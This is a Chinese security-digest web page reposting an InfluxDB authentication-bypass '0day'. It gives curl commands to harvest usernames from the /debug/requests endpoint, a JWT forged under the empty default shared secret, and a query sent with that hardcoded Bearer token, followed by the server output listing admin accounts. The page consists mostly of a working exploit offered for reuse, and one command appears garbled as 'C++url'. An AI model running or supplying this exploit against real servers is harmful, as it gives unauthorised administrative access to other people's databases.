首页 安全文摘 正文

influxdb认证绕过0day

0day复现步骤:1. 查找user namecurl -G "http://xxx:8086/debug/requests"2. 构造jwt token在线构造地址3. 构造认证头curl -G 'http://xxx:8086/query' --data-urlencode 'q=show users'

0day复现步骤:

1. 查找user name

C++url -G "http://xxx:8086/Debug/requests"

2. 构造jwt token

在线构造地址

influxdb认证绕过0day influxdb 0day jwt token 安全文摘  第1张

3. 构造认证头

curl -G 'http://xxx:8086/query' --data-urlencode 'q=show users' -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNTU5Mjg0OTM1fQ.tUClNot9LgStSw57n26DSN-3NPkBiHizk-XOHMfJJJw'

返回

{"results":[{"statement_id":0,"series":[{"columns":["user","admin"],"values":[["admin",true],["read",false],["write",false],["telegraf",true]]}]}]}

成功

漏洞原理

JWT token shared-secret 默认为空

JWT说明

0day原文

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1348.html

相关推荐

K8工具合集

不定期更新,文件比较大,可按需下载。工具有BUG或建议可直接Github上留言提权工具均可在远控Cmd或WebShell运行,大部份经过修改编译兼容性稳定性更好注意:不保证永久有效,喜欢自行保存。综合...

安全工具 3年前 (2019-04-30) 0 866449

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持